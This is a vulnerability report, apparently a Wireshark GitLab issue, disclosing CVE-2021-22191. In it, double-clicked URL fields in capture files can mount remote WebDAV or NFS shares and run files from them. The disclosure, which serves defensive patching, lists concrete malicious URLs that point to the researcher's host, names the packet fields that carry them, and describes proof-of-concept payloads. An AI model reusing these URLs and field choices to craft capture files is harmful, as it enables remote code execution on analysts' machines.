Headline
CVE-2021-22191: Code execution in Wireshark via non-http(s) schemes in URL fields (#17232) · Issues · Wireshark Foundation / wireshark
Improper URL handling in Wireshark 3.4.0 to 3.4.3 and 3.2.0 to 3.2.11 could allow remote code execution via via packet injection or crafted capture file.
The 15.0 major release is coming up! This version brings many exciting improvements to GitLab, but also removes some deprecated features. Visit the deprecations page to see what is scheduled for removal in 15.0, and check for any breaking changes that could impact your workflow.
This issue was reported to [email protected] on 2021-01-19 but has not been acknowledged so far. The Xubuntu NFS variant was discovered after the original report and has been added here.
Description
Some fields in the Wireshark proto_tree
are double-clickable and pass URLs with arbitrary schemes to the QDesktopServices::openUrl
function. http
and https
URLs passed to this function are opened by the browser which is generally safe. For some other schemes like dav
and file
however, referenced files will be opened by the system’s standard application associated with their file type. By preparing internet-hosted file shares and executable files, arbitrary code execution can be achieved via malicious pcap(ng)
files or captured live-traffic and some user interaction. Depending on which system and scheme/remote protocols are used, slightly different behaviors can be observed. Attached are two PoC videos:
1 - Windows:
- Packet/disector: DHCP option 114 (Captive Portal)
- Malicious URL:
file:////posisec.com/DavWWWRoot/jartest.jar
- File executed: jartest.jar - pops up a swing dialog box
- System: Fresh Windows 10 install with Wireshark 3.4.2 and standard JRE installation
- Backend: Anonymous WebDav share hosted at dav://posisec.com/ (src-IP restricted)
- Behavior: The user opens the malicious
pcap
file and double-clicks thefile
URL. The WebDav share is mounted in the background, and the .jar file is executed.
2.1 - Xubuntu NFS:
- Packet/disector: X509 Certificate authority info
- Malicious URL:
nfs://posisec.com/export/malicious_cmnd.desktop
- File executed: malicious_cmnd.desktop - pops up an xmessage dialog
- System: Fresh Xubuntu install with Wireshark 3.2.3
- Backend: Anonymous NFS share hosted at nfs://posisec.com/ (src-IP restricted)
- Behavior: The user opens the malicious
pcapng
file and double-clicks thenfs
URL. The NFS share is mounted in the background, and the .desktop file is executed.
2.2 - Xubuntu Webdav:
- Packet/disector: X509 Certificate authority info
- Malicious URL 1:
dav://posisec.com/
- Malicious URL 2:
file:///run/user/1000/gvfs/dav:host=posisec.com,ssl=false/cmdx.desktop
- File executed: cmdx.desktop - pops up an xmessage dialog
- System: Fresh Xubuntu install with Wireshark 3.2.3
- Backend: Anonymous WebDav share hosted at dav://posisec.com/ (src-IP restricted)
- Behavior: The user first double-clicks malicious URL 1 which mounts the Anonymous WebDav share and opens up the file explorer. When the user double-clicks malicious URL 2, the foreign .desktop file is executed without an OS warning since the now mounted share is referenced via a local file path.
Note that there are more schemes (sftp
, davs
, smb
, …) and payloads (.exe
, .bat
, …) that can be used to achieve slightly different behaviors. Also note that some ISPs or Access Point devices may block outgoing SMB traffic, preventing exploitation via internet-hosted SMB shares.
Risk
An attacker could distribute malicious capture files and entice people to inspect them. On Windows with JRE installed, a simple doubleclick on a crafted field is enough to cause code execution on the victim’s system.
Mitigation suggestion
Add sanitization logic in ProtoTree::itemDoubleClicked
to only allow whitelisted URL schemes (http
, https
).
Edited Feb 12, 2021 by
To upload designs, you’ll need to enable LFS and have an admin enable hashed storage. More information